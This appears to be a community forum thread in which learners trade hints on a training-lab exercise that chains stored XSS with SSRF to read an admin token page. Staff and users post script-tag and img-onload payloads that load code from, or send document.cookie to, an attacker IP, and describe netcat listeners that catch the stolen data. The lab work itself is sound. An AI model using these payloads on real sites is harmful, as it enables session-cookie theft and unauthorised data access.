Bronze II was stuck in one question looking for HINT.
Extend the XSS vulnerability to view the contents of the /admin/token page with SSRF.
johndoe321I changed the script to a different port to the one being bombarded and did another NC listener on that different port. Roled right in.
Community SupportHey shubham
Thank you for posting, and welcome to the Human Connection! I'm Chris, I work in the Customer Support Team, and I'll be happy to help you with your attempt 😊.
I'll be happy to share a hint to help you with your lab attempt:
In the Ask a Question page, add the following to the Message field: <script src="http://$KALI_IP/script.js" ></script>
Will you see if this helps you with your attempt?
Community ManagerHi shubham welcome to The Human Connection!
Please can you provide some detail of the steps you have already taken so that your fellow community members are able to assist you?
Bronze IThanks for welcome.
So I tire using netcat with the payload in message to make a reverse connection
Payload:<img src=xss onload="this.src='http://10.102.181.168:5556/admin/token?'+document.cookie;this.removeAttribute('onerror');"/>
Community ManagerHi shubham did the information above help?
If so, please don't forget to mark it as a Solution ✅
Marking a reply as a solution helps other community members to find answers to questions that they may also have. It also confirms to your fellow community members that their reply was helpful! You can accept more than one reply as a solution.
Bronze II am also having problems on this lesson. So far I haven't been able to get the site to execute any new code
I tried running the hint from below as well as the following:
<script src="http://0.0.0.0:8080/script.js"></script>
My console just converts it to a string and does not actually call into the <script>. (notice how the question field is a string).
I am sure I must be misunderstanding something, any help would be appreciated.
Community ManagerBronze IHaving the same issues. Script is running, but /admin/token immediately redirects back to /dashboard. Executed JS code in console and it returns html from /dashboard.
Created script.js on VM. Running netcat instance on port 8080 to handle HTTP request. I can see the request occur in terminal. Token not returned.
Command being used in message field: <script src="http://0.0.0.0:8080/script.js"></script>
ImmerserBronze INyePriorThanks for the reply. I also tried this method. I used ip address from ifconfig, local host (127.0.0.1), and 0.0.0.0 got the same result. If that were the case, how am I able to open the js file in the browser using http://0.0.0.0:8080/script.js url? The JS is executing when I expose the vulnerability and I can see the request happen in netcat... Therefore I feel confident that the issue is inside the js file or with the /admin/token itself. I have tried the python method and the netcat method. The /admin/token endpoint gets me a 302 permanent redirect. As a python full stack developer w/ a good understanding of accessing local host as a local web server... I think I'm missing something else or not understanding the flow completely.
Bronze IThey key is knowing that you have to use python to host the remote .js file in parallel with netcat to listen for the response of the XSS malicious scripts. Additionally, there are two steps to expose the data. One exposes the username and token cookie (question 1&2) in the query parameters. The other displays the token in the html body. The example code snippets work with VERY minor modifications. One thing I did based on feedback from a peer, was to wrap Netcat in a look to keep it active in terminal for subsequent requests.
Bronze IIIAgreed.
Run XSS exploit ensure your script allows this to loop with NC listening. Name and cookie given instantly. Then i hosted the payload using http.server and conducted SSRF this time using a different port number and NC. This dropped the full body then a cyber chef URLDecode the answer is available.
The actual script doesn’t need much work.
Bronze II have done the following so far:
On the terminal monitoring the http server activity, I see a GET /script.js every ~60s or so, and each time that happens, the nc listening on 5555 shows the same keepalive traffic w/ the same user ID & token information, but not the contents of the actual /admin/token page...
I have a feeling I am missing something in item 3 listed above - something not right w/ how i have the script.js payload set up...
Been stuck on this for way longer than I care to, any guidance would be greatly appreciated.
Bronze IIIjohndoe321I changed the script to a different port to the one being bombarded and did another NC listener on that different port. Roled right in.
Bronze IWow that did it instantly, thank you CyberSharpe!! Guess 5555 is already in-use/bound to the first exploit...
Community ManagerHey johndoe321 I'm pleased that CyberSharpe was able to help you here! If you found their reply useful, please don't forget to mark it as a Solution ✅
Marking a reply as a solution helps other community members to find answers to questions that they may also have. It also confirms to your fellow community members that their reply was helpful! You can accept more than one reply as a solution.
